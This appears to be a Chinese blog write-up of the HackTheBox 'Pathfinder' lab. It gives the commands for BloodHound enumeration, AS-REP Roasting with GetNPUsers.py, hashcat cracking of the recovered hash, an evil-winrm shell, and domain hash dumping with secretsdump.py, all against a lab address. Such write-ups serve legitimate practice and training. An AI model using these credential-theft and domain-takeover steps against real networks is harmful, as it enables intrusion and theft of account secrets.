HackTheBox-StartingPoint-Pathfinder WP

通过这题继续熟悉一下BloodHound的使用



0x01 信息收集

使用nmap进行端口扫描和服务探测:

nmap -sC -sV  -v -Pn  10.10.10.30

image-20210914152003544



在StartingPoint中,靶机是环环相扣的。之前的 Shied Box中我们能拿到账号和密码,结合nmap中扫描出的域名,我们可以使用blood-python进行域内信息的收集,后续可导进bloodhound分析。

bloodhound-python -u sandra -p Password1234! -d MEGACORP.LOCAL -c all -ns 10.10.10.30

image-20210914152048326




0x02 user.txt

将上述的四个文件导入BloodHound,然后在左上角的Analysis中点击最后一个,寻找可以发动AS-REP Roasting攻击的账户:

AS-REP Roasting是针对不需要预身份验证的用户帐户的Kerberos攻击。

预身份验证是Kerberos身份验证的第一步,旨在防止暴力破解密码猜测攻击。

在预身份验证期间,用户将输入其密码,该密码将用于加密时间戳,然后域控制器将尝试对其进行解密,并验证是否使用了正确的密码,并且该密码不会重播先前的请求。发出TGT,供用户将来使用。

如果禁用了预身份验证(DONT_REQ_PREAUTH),则我们可以为任何用户请求身份验证数据,那么DC将返回的加密TGT,我们就可以离线暴力破解的加密TGT。

默认情况下,Active Directory中需要预身份验证。但是,可以通过每个用户帐户上的用户帐户控制设置来控制此设置。



可以发现有一个账户SVC_BES能够满足我们的要求:

image-20210914151737829



点击该节点,在Node Info中找到Outbound Control Rights,点击First Degree Object Control,能够探索该账户能直接控制的对象。

image-20210914151843035



可以看到有个GetChangesAll,亦即我们能够拿到域控制器的(敏感)信息,包括来自其他域用户的密码哈希。

image-20210914151909714



使用Impacket中的GetNPUsers.py就能拿到上述的敏感信息:

python GetNPUsers.py MEGACORP.LOCAL/SVC_BES -request -no-pass -dc 10.10.10.30

image-20210914152113061



拿到哈希后可以拿去hashcat破解,破出密码是Sheffield19

hashcat.exe -a 0 -m 18200 hash "dict.txt"

image-20210914153010175



使用evil-winrm工具可以非常方便我们拿到shell,使用其他的WMI工具亦可。

evil-winrm -i 10.10.10.30 -u SVC_BES -p Sheffield19

image-20210914160308508



然后在桌面上可以拿到user.txt

image-20210914160359094




0x03 root.txt

提权的方式是使用简单的psexec,方法有很多,可以上线CS:

image-20210914160854150


也可以使用Impacket工具包中的secretsdump.py:

python secretsdump.py MEGACORP.LOCAL/SVC_BES:Sheffield19@10.10.10.30

image-20210914171022533



拿到hash值后在msf中配置好模块即可上线(这里的图有点问题,RHOSTS应为10.10.10.30):

image-20210914171318054


上线后即可在桌面拿到root.txt

image-20210914171350797

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值